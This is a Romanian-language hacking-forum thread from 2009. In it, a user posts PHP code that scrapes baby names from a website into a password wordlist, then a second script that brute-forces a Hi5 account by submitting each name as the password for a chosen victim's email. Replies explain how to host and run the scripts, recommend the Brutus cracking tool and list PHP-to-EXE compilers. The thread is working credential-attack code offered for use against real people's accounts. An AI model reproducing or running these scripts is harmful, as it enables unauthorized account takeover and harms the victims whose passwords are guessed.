dictionar brute force + exemplu Hi5

[loki]

O idee mai veche de-a mea (de se spargea kw3 de ras) despre cum sa iti faci un dictionar pentru brute force.

Precum se stie multi isi pun ca parole nume proprii. Ok, de unde sa luam un astfel de dictionar. O idee: siturile de bebelushi. Pentru ca este o moda de a publica liste intregi de nume de botezat bebeii, care site are mai multe, e mai respectabil.

Am luat si eu un site de bebe si am facut niste spicuiri in php. Rezultatul: un words.txt numai bun pentru un brutus sau ce mai aveti prin casa.

<?
$link="http://www.util21.ro/invatamant/nume-copii/nume-baietei-incepand-cu-";
// $link="http://www.util21.ro/invatamant/nume-copii/nume-fetite-incepand-cu-";

$fisier="";
for ($i=0; $i<26; $i++)
  { $page=$link.chr($i+97).".htm";
		$text=file_get_contents($page);
		$nume=explode('<span class="numecopii">',$text);
		for($j=0; $j<count($nume); $j++)
		{ $temp=explode("</span>",$nume[$j+1]);
		  $fisier.=$temp[0]."<br>";
		}
  }
 		$fisier=strtolower (ereg_replace(':','',$fisier));
		$fisier=ereg_replace(';','',$fisier);
		$fisier=ereg_replace('/','<br>',$fisier);
		$fisier=ereg_replace('<br><br>','<br>',$fisier);
		echo $fisier;
		$fisier=ereg_replace('<br>','\r\n',$fisier);
		file_put_contents("words.txt",$fisier);
 ?>

Pentru fetite comment prima linie si uncomment a doua.

PS Acum puteti sa va numiti bebeii dintr-o privire

Si o aplicatie practica: brute force hi5

<?
$victim="victim@yahoo.com"; // replace cu victima

$words=file_get_contents("words.txt");
$words=explode("\r\n",$words);

for ($i=0; $i<count($words); $i++)

  { $page=file_get_contents("http://m.hi5.com/friend/mobile/login/processLogin.do?email=".$victim."&password=".$words[$i]);
    // echo $words[$i]."<br>".$page;
    if(stristr($page, 'Error') === FALSE) echo "Parola lui ".$victim." este ".$words[$i];
  }
 ?>

Edited May 22, 2009 by loki
merged

[Guest Kabron]

Merge ca uns

[satanutz]

si cum il folosesc....pune si u link la program nu numai in cod aici

[loki]

si cum il folosesc....pune si u link la program nu numai in cod aici

tu esti, pacone? Sau ai venit sa mi te-n BAN?

EDIT: Hai sa il mut in tutoriale - altfel o mai vrea si altii PHP compilat in EXE

Edited May 23, 2009 by loki

[cobra2010]

Cum se foloseste codu asta ?

[nedo]

este cod php, il urci pe un host sub numele de : "orice nume vreti voi". Accesati pagina nou creeata. Dupa ce executi pagina respectiva, pe hostul respectiv o sa ai un fisier nou creat numit words.txt. Descarci acest fisier si il folosesti intr-un program care face brutforce genu brutus(nu il caut pe forum dar exista, daca va intereseaza cu adevarat cautati-l si voi nu mai asteptati mura in gura ca o sa ajungeti sa nu puteti face nimic singuri)

Folosesti brutus pe un ceva care vrei tu.

Cam asta e tot.

Partea a 2-a postata de loki se foloseste tot cam asa.

Urci partea a 2-a tot pe un host si executi, ai grija ca pe hostul respectiv sa exista si words.txt pentru a avea ce folosii.

[yo9gjx]

Omule esti un bun sociolog. La orice m-am gandit numai la situri pentru bebelusi nu.

Merci pentru idee si cod.

Sarbatori fericite

[mike_vio]

Aur frate, multumesc +1

[xpt1]

Pai... poti folosi unul din astea:

Download ExeOutput for PHP [trial] [pay]

phc -- Downloads [free] [cred ca e pt linux]

ZZEE PHPExe: compile your PHP web scripts into Windows GUI exes [trial] [pay]

Php to Exe Converter Free Download [nu am incredere]

Bambalam PHP EXE Compiler/Embedder 1.21 - Free php to exe converter! [free] [opensource]